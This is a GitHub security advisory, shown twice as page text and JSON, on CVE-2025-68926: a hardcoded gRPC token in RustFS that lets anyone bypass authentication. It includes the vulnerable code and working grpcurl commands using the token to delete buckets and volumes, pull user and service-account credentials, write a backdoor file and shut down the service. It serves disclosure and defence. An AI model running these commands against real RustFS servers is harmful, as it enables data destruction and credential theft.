ghsa-h956-rh7x-ppgj
Vulnerability from github
Published
2025-12-30 23:06
Modified
2025-12-30 23:06
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
RustFS has a gRPC Hardcoded Token Authentication Bypass
Details

Vulnerability Overview

Description

RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is: 1. Publicly exposed in the source code repository 2. Hardcoded on both client and server sides 3. Non-configurable with no mechanism for token rotation 4. Universally valid across all RustFS deployments

Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.

Vulnerable Code Analysis

Server-Side Authentication (rustfs/src/server/http.rs:679-686)

```rust

[allow(clippy::result_large_err)]

fn check_auth(req: Request<()>) -> std::result::Result<Request<()>, Status> { let token: MetadataValue<_> = "rustfs rpc".parse().unwrap(); // ⚠️ HARDCODED!

match req.metadata().get("authorization") {
    Some(t) if token == t => Ok(req),
    _ => Err(Status::unauthenticated("No valid auth token")),
}

} ```

Issues: - Static token hardcoded as string literal - No configuration mechanism (environment variable, file, etc.) - Token visible in public GitHub repository - Identical across all installations

Client-Side Authentication (crates/protos/src/lib.rs:153-174)

```rust pub async fn node_service_time_out_client( addr: &String, ) -> Result<NodeServiceClient<...>, Box> { let token: MetadataValue<_> = "rustfs rpc".parse()?; // ⚠️ SAME HARDCODED TOKEN!

// ...

Ok(NodeServiceClient::with_interceptor(
    channel,
    Box::new(move |mut req: Request<()>| {
        req.metadata_mut().insert("authorization", token.clone());
        Ok(req)
    }),
))

} ```

Issues: - Client uses identical hardcoded token - No secure token distribution mechanism - Token cannot be rotated without code changes

Service Integration (rustfs/src/server/http.rs:520-521)

rust let rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth); let service = hybrid(s3_service, rpc_service);

The check_auth interceptor is applied to all gRPC services via NodeServiceServer::with_interceptor, protecting all 50+ gRPC methods in node.proto with the same weak authentication.

Reproduction Steps

Environment Setup

Test Environment: - RustFS Server: localhost:9000 (HTTP + gRPC hybrid service) - RustFS Console: localhost:9001 - Container: rustfs/rustfs:latest (Docker Compose deployment) - Default credentials: rustfsadmin/rustfsadmin

Tools Required: - grpcurl v1.9.3+ (gRPC command-line client) - RustFS proto files: crates/protos/src/node.proto

Step 1: Verify Authentication is Enforced

Test 1.1: Request without authentication token

bash $ grpcurl -plaintext \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/Ping

Expected Result: ✅ Authentication failure

ERROR: Code: Unauthenticated Message: No valid auth token

Test 1.2: Request with incorrect token

bash $ grpcurl -plaintext \ -H 'authorization: wrong-token-12345' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/Ping

Expected Result: ✅ Authentication failure

ERROR: Code: Unauthenticated Message: No valid auth token

Conclusion: Authentication is properly enforced - unauthorized requests are rejected.

Step 2: Extract Hardcoded Token from Source Code

Public Source Code Analysis:

bash $ git clone https://github.com/rustfs/rustfs.git $ cd rustfs $ grep -rn '"rustfs rpc"' --include='*.rs'

Result: ✅ Token found in public source code

rustfs/src/server/http.rs:680: let token: MetadataValue<_> = "rustfs rpc".parse().unwrap(); crates/protos/src/lib.rs:153: let token: MetadataValue<_> = "rustfs rpc".parse()?;

Extracted Token: rustfs rpc

Step 3: Exploit - Authenticate Using Hardcoded Token

Test 3.1: Successful authentication with hardcoded token

bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/Ping

Result: 🔓 AUTHENTICATION BYPASSED

json { "version": "1", "body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA==" }

Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.

Step 4: Demonstrate Access to Sensitive Management APIs

Test 4.1: Server Configuration Disclosure

bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/ServerInfo

Result: ✅ Complete server configuration disclosed

json { "success": true, "serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA=" }

Analysis: - Server returned complete configuration including storage paths, endpoint addresses, version info - Binary data contains sensitive internal state (MessagePack encoded) - Information disclosure confirmed

Test 4.2: Disk Information Access

bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/DiskInfo

Result: ✅ Authenticated request accepted (business logic error returned, not auth error)

json { "error": { "code": 36, "errorInfo": "io error can not find disk" } }

Analysis: - Request passed authentication (error is business logic, not authentication) - Proves attacker has authenticated access to sensitive system information APIs

Impact Analysis

Affected APIs

All 50+ gRPC methods in node_service.NodeService are vulnerable:

🔴 CRITICAL Impact - Data Destruction

  • DeleteBucket - Delete production buckets
  • DeleteVolume - Destroy entire storage volumes
  • DeleteUser - Remove legitimate users
  • DeletePolicy - Remove access control policies
  • DeleteServiceAccount - Remove service accounts

🔴 CRITICAL Impact - Configuration Manipulation

  • ReloadSiteReplicationConfig - Corrupt cluster replication
  • SignalService - Control service lifecycle
  • LoadPolicy - Modify access control policies
  • LoadPolicyMapping - Alter policy assignments

🟠 HIGH Impact - Unauthorized Data Access/Modification

  • ReadAll / ReadAt - Read arbitrary data
  • WriteAll / WriteStream - Inject malicious data
  • RenameFile / RenameData - Manipulate file system
  • UpdateMetadata / WriteMetadata - Corrupt metadata

🟠 HIGH Impact - Privilege Escalation

  • LoadUser - Access user credentials
  • LoadServiceAccount - Access service credentials
  • LoadGroup - Access group memberships

🟡 MEDIUM Impact - Information Disclosure

  • ServerInfo - Server configuration disclosure
  • DiskInfo - Storage configuration disclosure
  • GetMetrics - Performance metrics disclosure
  • GetBucketStats - Bucket statistics disclosure
  • LocalStorageInfo - Storage system information
  • ListBucket - Bucket enumeration

🟡 MEDIUM Impact - Cluster Operations

  • MakeBucket - Unauthorized bucket creation
  • HealBucket - Trigger repair operations
  • BackgroundHealStatus - Monitor internal operations

Attack Scenarios

Scenario 1: Data Destruction

```bash

Enumerate all buckets

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"options": "{}"}' \ localhost:9000 node_service.NodeService/ListBucket

Delete critical production bucket

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"bucket": "production-data"}' \ localhost:9000 node_service.NodeService/DeleteBucket

Delete entire storage volume

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"volume": "vol1"}' \ localhost:9000 node_service.NodeService/DeleteVolume ```

Impact: Complete data loss, business disruption

Scenario 2: Credential Harvesting

```bash

Extract user credentials

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"access_key": "admin"}' \ localhost:9000 node_service.NodeService/LoadUser

Extract service account credentials

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"access_key": "service-account"}' \ localhost:9000 node_service.NodeService/LoadServiceAccount

Exfiltrate IAM policies

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"name": "admin-policy"}' \ localhost:9000 node_service.NodeService/LoadPolicy ```

Impact: Complete IAM compromise, lateral movement

Scenario 3: Backdoor Installation

```bash

Inject malicious data into system paths

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"volume": "config", "path": "backdoor.sh", "buf": "..."}' \ localhost:9000 node_service.NodeService/WriteAll

Modify system configuration

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"bucket": "system", "path": ".rustfs.sys/config.json", "fi": "..."}' \ localhost:9000 node_service.NodeService/WriteMetadata ```

Impact: Persistent compromise, further exploitation

Scenario 4: Cluster Disruption

```bash

Corrupt replication configuration

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{}' \ localhost:9000 node_service.NodeService/ReloadSiteReplicationConfig

Force service restart/shutdown

grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"sig": 2}' \ localhost:9000 node_service.NodeService/SignalService ```

Impact: Distributed system failure, data inconsistency

Exploitation Preconditions

Required Conditions

All conditions typically met in production deployments:

  1. Network Access: Attacker can reach gRPC port (9000/TCP)
  2. RustFS binds to 0.0.0.0 by default (all interfaces)

  3. Commonly exposed for distributed node communication

  4. Token Knowledge: Token is publicly known

  5. Available in public GitHub repository
  6. Identical across all RustFS installations

  7. Cannot be changed without code modification

  8. No Additional Security Controls:

  9. No mTLS/certificate-based authentication
  10. No IP whitelisting (typically)
  11. No VPN/network segmentation requirements
  12. No rate limiting on authentication attempts

Attack Complexity

Complexity: 🟢 TRIVIAL

  • Single grpcurl command with hardcoded token
  • No exploit development required
  • No timing or race conditions
  • No target-specific reconnaissance needed
  • Fully automatable
  • Works against any RustFS instance

Time to Exploit: < 1 minute

Security Impact

Confidentiality Impact: HIGH

  • Complete Data Disclosure: All stored objects readable via ReadAll/ReadAt
  • Credential Exposure: IAM users, service accounts, policies accessible
  • Configuration Disclosure: Server, storage, cluster configuration leaked
  • Metrics Exposure: Performance and usage metrics accessible

Integrity Impact: HIGH

  • Data Modification: Arbitrary data injection via WriteAll/WriteStream
  • Metadata Corruption: File metadata tampering via WriteMetadata
  • Policy Manipulation: IAM policies modifiable via LoadPolicy
  • Configuration Changes: Cluster replication config alterable

Availability Impact: HIGH

  • Data Destruction: Buckets/volumes deletable via DeleteBucket/DeleteVolume
  • Service Disruption: Service controllable via SignalService
  • Cluster Degradation: Replication corruption via ReloadSiteReplicationConfig
  • Resource Exhaustion: Arbitrary data writes, bucket creation

Compliance & Regulatory Impact

Standards Violated

PCI-DSS v4.0

  • Requirement 6.5.3: Broken authentication
  • Requirement 8.2: Strong authentication required
  • Requirement 8.6: Multi-factor authentication required

OWASP Top 10 2021

  • A07:2021 - Identification and Authentication Failures
  • Use of hard-coded credentials
  • Missing or ineffective authentication

NIST Cybersecurity Framework

  • PR.AC-1: Access control mechanisms violated
  • PR.AC-7: Authentication mechanisms insufficient

SOC 2 Type II

  • CC6.1: Logical access controls inadequate
  • CC6.6: Credential management controls missing

Proof of Concept

Automated POC Script

File: audit_analysis/poc_cve_2025_008_grpc_token_working.sh

Usage: bash chmod +x poc_cve_2025_008_grpc_token_working.sh ./poc_cve_2025_008_grpc_token_working.sh [target_host:port]

Default Target: localhost:9000

POC Output Summary

``` [PHASE 1] Baseline Testing ✓ Without token: REJECTED (Unauthenticated) ✓ With wrong token: REJECTED (Unauthenticated)

[PHASE 2] Exploit ✓ With hardcoded token "rustfs rpc": ACCEPTED ✅

[PHASE 3] Sensitive API Access ✓ ServerInfo: SUCCESS - Configuration disclosed ✓ DiskInfo: SUCCESS - System information accessible

[RESULT] VULNERABILITY CONFIRMED ```

Acknowledgements

RustFS would like to thank bilisheep from the Xmirror Security Team for discovering and responsibly reporting this vulnerability.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "rustfs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.0-alpha.77"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68926"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-798"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-30T23:06:15Z",
    "nvd_published_at": "2025-12-30T17:15:43Z",
    "severity": "CRITICAL"
  },
  "details": "## Vulnerability Overview\n\n### Description\n\nRustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is:\n1. **Publicly exposed** in the source code repository\n2. **Hardcoded** on both client and server sides\n3. **Non-configurable** with no mechanism for token rotation\n4. **Universally valid** across all RustFS deployments\n\nAny attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.\n\n---\n\n## Vulnerable Code Analysis\n\n### Server-Side Authentication (rustfs/src/server/http.rs:679-686)\n\n```rust\n#[allow(clippy::result_large_err)]\nfn check_auth(req: Request\u003c()\u003e) -\u003e std::result::Result\u003cRequest\u003c()\u003e, Status\u003e {\n    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse().unwrap();  // \u26a0\ufe0f HARDCODED!\n\n    match req.metadata().get(\"authorization\") {\n        Some(t) if token == t =\u003e Ok(req),\n        _ =\u003e Err(Status::unauthenticated(\"No valid auth token\")),\n    }\n}\n```\n\n**Issues**:\n- Static token hardcoded as string literal\n- No configuration mechanism (environment variable, file, etc.)\n- Token visible in public GitHub repository\n- Identical across all installations\n\n### Client-Side Authentication (crates/protos/src/lib.rs:153-174)\n\n```rust\npub async fn node_service_time_out_client(\n    addr: \u0026String,\n) -\u003e Result\u003cNodeServiceClient\u003c...\u003e, Box\u003cdyn Error\u003e\u003e {\n    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse()?;  // \u26a0\ufe0f SAME HARDCODED TOKEN!\n\n    // ...\n\n    Ok(NodeServiceClient::with_interceptor(\n        channel,\n        Box::new(move |mut req: Request\u003c()\u003e| {\n            req.metadata_mut().insert(\"authorization\", token.clone());\n            Ok(req)\n        }),\n    ))\n}\n```\n\n**Issues**:\n- Client uses identical hardcoded token\n- No secure token distribution mechanism\n- Token cannot be rotated without code changes\n\n### Service Integration (rustfs/src/server/http.rs:520-521)\n\n```rust\nlet rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth);\nlet service = hybrid(s3_service, rpc_service);\n```\n\nThe `check_auth` interceptor is applied to all gRPC services via `NodeServiceServer::with_interceptor`, protecting **all 50+ gRPC methods** in `node.proto` with the same weak authentication.\n\n---\n\n## Reproduction Steps\n\n### Environment Setup\n\n**Test Environment**:\n- RustFS Server: `localhost:9000` (HTTP + gRPC hybrid service)\n- RustFS Console: `localhost:9001`\n- Container: `rustfs/rustfs:latest` (Docker Compose deployment)\n- Default credentials: `rustfsadmin/rustfsadmin`\n\n**Tools Required**:\n- `grpcurl` v1.9.3+ (gRPC command-line client)\n- RustFS proto files: `crates/protos/src/node.proto`\n\n### Step 1: Verify Authentication is Enforced\n\n**Test 1.1: Request without authentication token**\n\n```bash\n$ grpcurl -plaintext \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/Ping\n```\n\n**Expected Result**: \u2705 Authentication failure\n\n```\nERROR:\n  Code: Unauthenticated\n  Message: No valid auth token\n```\n\n**Test 1.2: Request with incorrect token**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: wrong-token-12345\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/Ping\n```\n\n**Expected Result**: \u2705 Authentication failure\n\n```\nERROR:\n  Code: Unauthenticated\n  Message: No valid auth token\n```\n\n**Conclusion**: Authentication is properly enforced - unauthorized requests are rejected.\n\n---\n\n### Step 2: Extract Hardcoded Token from Source Code\n\n**Public Source Code Analysis**:\n\n```bash\n$ git clone https://github.com/rustfs/rustfs.git\n$ cd rustfs\n$ grep -rn \u0027\"rustfs rpc\"\u0027 --include=\u0027*.rs\u0027\n```\n\n**Result**: \u2705 Token found in public source code\n\n```\nrustfs/src/server/http.rs:680:    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse().unwrap();\ncrates/protos/src/lib.rs:153:    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse()?;\n```\n\n**Extracted Token**: `rustfs rpc`\n\n---\n\n### Step 3: Exploit - Authenticate Using Hardcoded Token\n\n**Test 3.1: Successful authentication with hardcoded token**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: rustfs rpc\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/Ping\n```\n\n**Result**: \ud83d\udd13 **AUTHENTICATION BYPASSED**\n\n```json\n{\n  \"version\": \"1\",\n  \"body\": \"DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA==\"\n}\n```\n\n**Analysis**: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.\n\n---\n\n### Step 4: Demonstrate Access to Sensitive Management APIs\n\n**Test 4.1: Server Configuration Disclosure**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: rustfs rpc\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/ServerInfo\n```\n\n**Result**: \u2705 **Complete server configuration disclosed**\n\n```json\n{\n  \"success\": true,\n  \"serverProperties\": \"n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA=\"\n}\n```\n\n**Analysis**:\n- Server returned complete configuration including storage paths, endpoint addresses, version info\n- Binary data contains sensitive internal state (MessagePack encoded)\n- Information disclosure confirmed\n\n**Test 4.2: Disk Information Access**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: rustfs rpc\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/DiskInfo\n```\n\n**Result**: \u2705 **Authenticated request accepted** (business logic error returned, not auth error)\n\n```json\n{\n  \"error\": {\n    \"code\": 36,\n    \"errorInfo\": \"io error can not find disk\"\n  }\n}\n```\n\n**Analysis**:\n- Request passed authentication (error is business logic, not authentication)\n- Proves attacker has authenticated access to sensitive system information APIs\n\n---\n\n## Impact Analysis\n\n### Affected APIs\n\nAll 50+ gRPC methods in `node_service.NodeService` are vulnerable:\n\n#### \ud83d\udd34 **CRITICAL Impact - Data Destruction**\n- `DeleteBucket` - Delete production buckets\n- `DeleteVolume` - Destroy entire storage volumes\n- `DeleteUser` - Remove legitimate users\n- `DeletePolicy` - Remove access control policies\n- `DeleteServiceAccount` - Remove service accounts\n\n#### \ud83d\udd34 **CRITICAL Impact - Configuration Manipulation**\n- `ReloadSiteReplicationConfig` - Corrupt cluster replication\n- `SignalService` - Control service lifecycle\n- `LoadPolicy` - Modify access control policies\n- `LoadPolicyMapping` - Alter policy assignments\n\n#### \ud83d\udfe0 **HIGH Impact - Unauthorized Data Access/Modification**\n- `ReadAll` / `ReadAt` - Read arbitrary data\n- `WriteAll` / `WriteStream` - Inject malicious data\n- `RenameFile` / `RenameData` - Manipulate file system\n- `UpdateMetadata` / `WriteMetadata` - Corrupt metadata\n\n#### \ud83d\udfe0 **HIGH Impact - Privilege Escalation**\n- `LoadUser` - Access user credentials\n- `LoadServiceAccount` - Access service credentials\n- `LoadGroup` - Access group memberships\n\n#### \ud83d\udfe1 **MEDIUM Impact - Information Disclosure**\n- `ServerInfo` - Server configuration disclosure\n- `DiskInfo` - Storage configuration disclosure\n- `GetMetrics` - Performance metrics disclosure\n- `GetBucketStats` - Bucket statistics disclosure\n- `LocalStorageInfo` - Storage system information\n- `ListBucket` - Bucket enumeration\n\n#### \ud83d\udfe1 **MEDIUM Impact - Cluster Operations**\n- `MakeBucket` - Unauthorized bucket creation\n- `HealBucket` - Trigger repair operations\n- `BackgroundHealStatus` - Monitor internal operations\n\n### Attack Scenarios\n\n#### Scenario 1: Data Destruction\n\n```bash\n# Enumerate all buckets\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"options\": \"{}\"}\u0027 \\\n  localhost:9000 node_service.NodeService/ListBucket\n\n# Delete critical production bucket\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"bucket\": \"production-data\"}\u0027 \\\n  localhost:9000 node_service.NodeService/DeleteBucket\n\n# Delete entire storage volume\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"volume\": \"vol1\"}\u0027 \\\n  localhost:9000 node_service.NodeService/DeleteVolume\n```\n\n**Impact**: Complete data loss, business disruption\n\n#### Scenario 2: Credential Harvesting\n\n```bash\n# Extract user credentials\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"access_key\": \"admin\"}\u0027 \\\n  localhost:9000 node_service.NodeService/LoadUser\n\n# Extract service account credentials\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"access_key\": \"service-account\"}\u0027 \\\n  localhost:9000 node_service.NodeService/LoadServiceAccount\n\n# Exfiltrate IAM policies\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"name\": \"admin-policy\"}\u0027 \\\n  localhost:9000 node_service.NodeService/LoadPolicy\n```\n\n**Impact**: Complete IAM compromise, lateral movement\n\n#### Scenario 3: Backdoor Installation\n\n```bash\n# Inject malicious data into system paths\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"volume\": \"config\", \"path\": \"backdoor.sh\", \"buf\": \"...\"}\u0027 \\\n  localhost:9000 node_service.NodeService/WriteAll\n\n# Modify system configuration\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"bucket\": \"system\", \"path\": \".rustfs.sys/config.json\", \"fi\": \"...\"}\u0027 \\\n  localhost:9000 node_service.NodeService/WriteMetadata\n```\n\n**Impact**: Persistent compromise, further exploitation\n\n#### Scenario 4: Cluster Disruption\n\n```bash\n# Corrupt replication configuration\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{}\u0027 \\\n  localhost:9000 node_service.NodeService/ReloadSiteReplicationConfig\n\n# Force service restart/shutdown\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n  -d \u0027{\"sig\": 2}\u0027 \\\n  localhost:9000 node_service.NodeService/SignalService\n```\n\n**Impact**: Distributed system failure, data inconsistency\n\n---\n\n## Exploitation Preconditions\n\n### Required Conditions\n\n\u2705 **All conditions typically met in production deployments**:\n\n1. **Network Access**: Attacker can reach gRPC port (9000/TCP)\n   - RustFS binds to `0.0.0.0` by default (all interfaces)\n   - Commonly exposed for distributed node communication\n\n2. **Token Knowledge**: Token is publicly known\n   - Available in public GitHub repository\n   - Identical across all RustFS installations\n   - Cannot be changed without code modification\n\n3. **No Additional Security Controls**:\n   - No mTLS/certificate-based authentication\n   - No IP whitelisting (typically)\n   - No VPN/network segmentation requirements\n   - No rate limiting on authentication attempts\n\n### Attack Complexity\n\n**Complexity**: \ud83d\udfe2 **TRIVIAL**\n\n- Single `grpcurl` command with hardcoded token\n- No exploit development required\n- No timing or race conditions\n- No target-specific reconnaissance needed\n- Fully automatable\n- Works against any RustFS instance\n\n**Time to Exploit**: \u003c 1 minute\n\n---\n\n## Security Impact\n\n### Confidentiality Impact: HIGH\n\n- **Complete Data Disclosure**: All stored objects readable via `ReadAll`/`ReadAt`\n- **Credential Exposure**: IAM users, service accounts, policies accessible\n- **Configuration Disclosure**: Server, storage, cluster configuration leaked\n- **Metrics Exposure**: Performance and usage metrics accessible\n\n### Integrity Impact: HIGH\n\n- **Data Modification**: Arbitrary data injection via `WriteAll`/`WriteStream`\n- **Metadata Corruption**: File metadata tampering via `WriteMetadata`\n- **Policy Manipulation**: IAM policies modifiable via `LoadPolicy`\n- **Configuration Changes**: Cluster replication config alterable\n\n### Availability Impact: HIGH\n\n- **Data Destruction**: Buckets/volumes deletable via `DeleteBucket`/`DeleteVolume`\n- **Service Disruption**: Service controllable via `SignalService`\n- **Cluster Degradation**: Replication corruption via `ReloadSiteReplicationConfig`\n- **Resource Exhaustion**: Arbitrary data writes, bucket creation\n\n---\n\n## Compliance \u0026 Regulatory Impact\n\n### Standards Violated\n\n#### PCI-DSS v4.0\n- **Requirement 6.5.3**: Broken authentication\n- **Requirement 8.2**: Strong authentication required\n- **Requirement 8.6**: Multi-factor authentication required\n\n#### OWASP Top 10 2021\n- **A07:2021 - Identification and Authentication Failures**\n  - Use of hard-coded credentials\n  - Missing or ineffective authentication\n\n#### NIST Cybersecurity Framework\n- **PR.AC-1**: Access control mechanisms violated\n- **PR.AC-7**: Authentication mechanisms insufficient\n\n#### SOC 2 Type II\n- **CC6.1**: Logical access controls inadequate\n- **CC6.6**: Credential management controls missing\n\n\n---\n\n## Proof of Concept\n\n### Automated POC Script\n\n**File**: `audit_analysis/poc_cve_2025_008_grpc_token_working.sh`\n\n**Usage**:\n```bash\nchmod +x poc_cve_2025_008_grpc_token_working.sh\n./poc_cve_2025_008_grpc_token_working.sh [target_host:port]\n```\n\n**Default Target**: `localhost:9000`\n\n### POC Output Summary\n\n```\n[PHASE 1] Baseline Testing\n  \u2713 Without token: REJECTED (Unauthenticated)\n  \u2713 With wrong token: REJECTED (Unauthenticated)\n\n[PHASE 2] Exploit\n  \u2713 With hardcoded token \"rustfs rpc\": ACCEPTED \u2705\n\n[PHASE 3] Sensitive API Access\n  \u2713 ServerInfo: SUCCESS - Configuration disclosed\n  \u2713 DiskInfo: SUCCESS - System information accessible\n\n[RESULT] VULNERABILITY CONFIRMED\n```\n\n## Acknowledgements\n\nRustFS would like to thank **bilisheep** from the **Xmirror Security Team** for discovering and responsibly reporting this vulnerability.",
  "id": "GHSA-h956-rh7x-ppgj",
  "modified": "2025-12-30T23:06:15Z",
  "published": "2025-12-30T23:06:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68926"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rustfs/rustfs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rustfs/rustfs/releases/tag/1.0.0-alpha.77"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RustFS has a gRPC Hardcoded Token Authentication Bypass"
}


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